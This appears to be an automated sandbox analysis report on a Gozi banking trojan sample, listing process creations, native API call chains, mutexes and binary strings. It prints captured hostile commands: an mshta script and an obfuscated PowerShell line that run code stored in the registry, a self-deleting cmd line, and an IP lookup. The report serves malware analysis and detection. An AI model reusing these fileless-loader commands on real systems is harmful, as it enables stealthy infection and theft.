Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA986D0 36_2_0000020FDEA986D0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAAAB44 36_2_0000020FDEAAAB44
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA8A6D0 36_2_0000020FDEA8A6D0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA812BC 36_2_0000020FDEA812BC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA952CC 36_2_0000020FDEA952CC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA7EA0 36_2_0000020FDEAA7EA0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA37D0 36_2_0000020FDEAA37D0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9BC10 36_2_0000020FDEA9BC10
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA95828 36_2_0000020FDEA95828
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA8820 36_2_0000020FDEAA8820
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA98024 36_2_0000020FDEA98024
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA97BFC 36_2_0000020FDEA97BFC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9B008 36_2_0000020FDEA9B008
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9A808 36_2_0000020FDEA9A808
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA92804 36_2_0000020FDEA92804
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA87F64 36_2_0000020FDEA87F64
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA2330 36_2_0000020FDEAA2330
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9FF4C 36_2_0000020FDEA9FF4C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA99740 36_2_0000020FDEA99740
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA8CF44 36_2_0000020FDEA8CF44
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA8FA8 36_2_0000020FDEAA8FA8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA2BA0 36_2_0000020FDEAA2BA0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA83BA4 36_2_0000020FDEA83BA4
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA940E8 36_2_0000020FDEA940E8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA944B4 36_2_0000020FDEA944B4
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9751C 36_2_0000020FDEA9751C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA868FC 36_2_0000020FDEA868FC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA9858 36_2_0000020FDEAA9858
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA8C49C 36_2_0000020FDEA8C49C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA83890 36_2_0000020FDEA83890
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA8DCA8 36_2_0000020FDEA8DCA8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9CCA8 36_2_0000020FDEA9CCA8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA84080 36_2_0000020FDEA84080
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA831D4 36_2_0000020FDEA831D4
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA91618 36_2_0000020FDEA91618
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA3E2C 36_2_0000020FDEAA3E2C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA89DF0 36_2_0000020FDEA89DF0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA8B154 36_2_0000020FDEA8B154
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA5954 36_2_0000020FDEAA5954
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA7D6C 36_2_0000020FDEAA7D6C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA4530 36_2_0000020FDEAA4530
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9194B 36_2_0000020FDEA9194B
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA90544 36_2_0000020FDEA90544
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA96190 36_2_0000020FDEA96190
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA8DA0 36_2_0000020FDEAA8DA0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAAC588 36_2_0000020FDEAAC588
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAAB58C 36_2_0000020FDEAAB58C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030463BC 47_2_030463BC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304A241 47_2_0304A241
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304F1EE 47_2_0304F1EE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303504A 47_2_0303504A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303C086 47_2_0303C086
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030478F1 47_2_030478F1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304CF97 47_2_0304CF97
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03039D64 47_2_03039D64
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030395FE 47_2_030395FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03055430 47_2_03055430
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030334DC 47_2_030334DC
Contains functionality to launch a process as a different user
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0E6B9 CreateProcessAsUserA, 8_2_03F0E6B9
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040140F NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 8_2_0040140F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040182F GetProcAddress,NtCreateSection,memset, 8_2_0040182F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00401ABC NtMapViewOfSection, 8_2_00401ABC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A231E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 8_2_010A231E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A5D85 GetProcAddress,NtCreateSection,memset, 8_2_010A5D85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A60A0 NtMapViewOfSection, 8_2_010A60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A8185 NtQueryVirtualMemory, 8_2_010A8185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1B38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 8_2_03F1B38D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0D317 NtMapViewOfSection, 8_2_03F0D317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F21AE3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 8_2_03F21AE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0D274 NtQueryInformationProcess, 8_2_03F0D274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F229E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 8_2_03F229E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 8_2_03F0317C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0696A GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 8_2_03F0696A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F12931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 8_2_03F12931
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F076E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 8_2_03F076E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1CEED GetProcAddress,NtCreateSection,memset, 8_2_03F1CEED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F17523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 8_2_03F17523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F08C10 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 8_2_03F08C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F10B30 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 8_2_03F10B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F10A74 NtReadVirtualMemory, 8_2_03F10A74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F2389B NtGetContextThread,RtlNtStatusToDosError, 8_2_03F2389B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 8_2_03F0483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F03F97 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 8_2_03F03F97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F17EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 8_2_03F17EEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F01641 memset,NtQueryInformationProcess, 8_2_03F01641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0155B NtQuerySystemInformation,RtlNtStatusToDosError, 8_2_03F0155B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1E4D5 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 8_2_03F1E4D5
Source: C:\Windows\System32\control.exe Code function: 28_2_00E69994 NtReadVirtualMemory, 28_2_00E69994
Source: C:\Windows\System32\control.exe Code function: 28_2_00E56140 NtAllocateVirtualMemory, 28_2_00E56140
Source: C:\Windows\System32\control.exe Code function: 28_2_00E51B84 NtQueryInformationProcess, 28_2_00E51B84
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose, 28_2_00E6AC44
Source: C:\Windows\System32\control.exe Code function: 28_2_00E73C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 28_2_00E73C1C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E7B58C NtSetContextThread,NtUnmapViewOfSection,NtClose, 28_2_00E7B58C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E70E70 NtMapViewOfSection, 28_2_00E70E70
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5E614 NtCreateSection, 28_2_00E5E614
Source: C:\Windows\System32\control.exe Code function: 28_2_00E51FBC NtWriteVirtualMemory, 28_2_00E51FBC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5FF60 RtlAllocateHeap,NtQueryInformationProcess, 28_2_00E5FF60
Source: C:\Windows\System32\control.exe Code function: 28_2_00E8F01F NtProtectVirtualMemory,NtProtectVirtualMemory, 28_2_00E8F01F
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA81B84 NtQueryInformationProcess, 36_2_0000020FDEA81B84
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose, 36_2_0000020FDEA9AC44
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEABF00B NtProtectVirtualMemory,NtProtectVirtualMemory, 36_2_0000020FDEABF00B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303D274 NtQueryInformationProcess, 47_2_0303D274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03051AE3 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 47_2_03051AE3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030529E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 47_2_030529E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03047523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 47_2_03047523
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03031641 memset,NtQueryInformationProcess, 47_2_03031641
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03047EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 47_2_03047EEF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303155B NtQuerySystemInformation,RtlNtStatusToDosError, 47_2_0303155B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304E4D5 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 47_2_0304E4D5
Sample file is different than original file name gathered from version info
Source: gozi.exe Binary or memory string: OriginalFilename vs gozi.exe
Source: gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAdMunch.exe6 vs gozi.exe
Source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEventManager.dll: vs gozi.exe
Source: gozi.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\gozi.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gozi.exe.log
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winEXE@35/22@10/2
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: gozi.exe Virustotal: Detection: 38%
Source: gozi.exe Metadefender: Detection: 40%
Source: gozi.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\gozi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\gozi.exe "C:\Users\user\Desktop\gozi.exe"
Source: C:\Users\user\Desktop\gozi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdpkmtso.umo.ps1
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp Binary or memory string: INSERT INTO `users` (`Login`, `Password`, `Role`) VALUES(@uLogin, @uPassword, @uRole);
Source: gozi.exe Binary or memory string: SELECT * FROM `transport`;
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp Binary or memory string: INSERT INTO `transport` (`Type`, `Consumption`) VALUES(@uType, @uCons);
Source: gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp Binary or memory string: INSERT INTO `waybills` (`DriverId`, `TransportId`, `Distance`, `Price`, `Date`) VALUES(@DriverId, @TransportId, @Distance, @Price, @Date);
Source: gozi.exe Binary or memory string: SELECT * FROM `drivers` WHERE `Login` = @uLogin;
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp Binary or memory string: SELECT * FROM `users` WHERE `Login` = @uLogin AND `Password` = @uPassword;
Source: gozi.exe Binary or memory string: SELECT * FROM `drivers` WHERE `Id` = @Id;
Source: gozi.exe Binary or memory string: SELECT * FROM `transport` WHERE `Id` = @Id;
Source: gozi.exe Binary or memory string: SELECT * FROM `waybills`;
Source: C:\Users\user\Desktop\gozi.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A1141 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 8_2_010A1141
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4292:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{C2944618-39CD-4415-D316-7DB8B7AA016C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\{C68D421A-6D0A-E8E8-275A-F19C4B2EB590}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6E68996D-F514-D0A1-EF82-F90493D63D78}
Source: C:\Windows\SysWOW64\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{3AB6673A-5150-7C4D-AB0E-15700F2219A4}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_01
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{22921B96-19EB-A4D9-B376-5D18970AE1CC}
Source: gozi.exe, transport_manager/MainPage.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\Desktop\gozi.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\gozi.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: gozi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: gozi.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: gozi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source: Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source: Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: gozi.exe, transport_manager/MainPage.cs .Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs .Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs .Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010AB72E push ecx; ret 8_2_010AB734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A7F4F push ecx; ret 8_2_010A7F5F
